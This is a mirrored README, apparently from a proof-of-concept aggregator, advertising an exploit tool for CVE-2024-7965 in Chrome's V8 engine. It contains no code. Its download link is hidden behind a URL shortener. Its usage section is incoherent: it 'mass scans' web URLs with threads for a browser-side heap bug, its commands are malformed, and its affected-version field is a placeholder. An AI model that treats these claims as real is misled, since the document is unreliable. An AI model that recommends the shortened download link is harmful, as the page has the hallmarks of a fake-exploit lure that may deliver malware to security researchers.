关联漏洞
介绍
# 🛠 CVE-2024-7965 Exploit
## 🌟 Description
This script targets the `CVE-2024-7965` vulnerability affecting the JavaScript V8 engine used in Google Chrome. The issue, rated `8.8` on the CVSS scale, arises from an imperfect implementation allowing attackers to exploit heap corruption via specially crafted HTML pages. This vulnerability poses a significant threat to the confidentiality and integrity of affected systems.
## ⚙️ Installation
To set up the exploitation tool, follow these steps:
Download the repository:
### [Download here](https://t.ly/uUL03)
Navigate to the tool's directory:
cd CVE-2024-7965
## 🚀 Usage
To use the tool, run the script from the command line as follows:
JavaScript exploit.js [options]
Options
`-u`, --url: Specify the target URL or IP address.
`-f`, --file: Specify a file containing a list of URLs to scan.
`-t`, --threads: Set the number of threads for concurrent scanning.
`-o`, --output: Define an output file to save the scan results.
When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to exploit the vulnerability.
Example
$ js CVE-2024-7965 exploit.js -u http://example.com [+] Exploit executed successfully. [!] http://example.com is vulnerable to CVE-2024-7965.
## 📊 Mass Scanning
For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.
js CVE-2024-7965 exploit.js -f urls.txt
## 🗒 Affected Versions
The vulnerability affects the following versions of Google Chrome with the V8 JavaScript engine:
Google Chrome versions prior to [latest fixed version]
Additional versions may be affected.
Please refer to Google's official advisories for specific version details.
## 🛡 Disclaimer
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
## 👏 Acknowledgments
Special thanks to the security researchers who discovered and reported CVE-2024-7965 and contributed to improving the security of web technologies.
文件快照
[4.0K] /data/pocs/6e2e87707a0a6cdeba0e37a2ed34374f55c67f31
└── [2.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。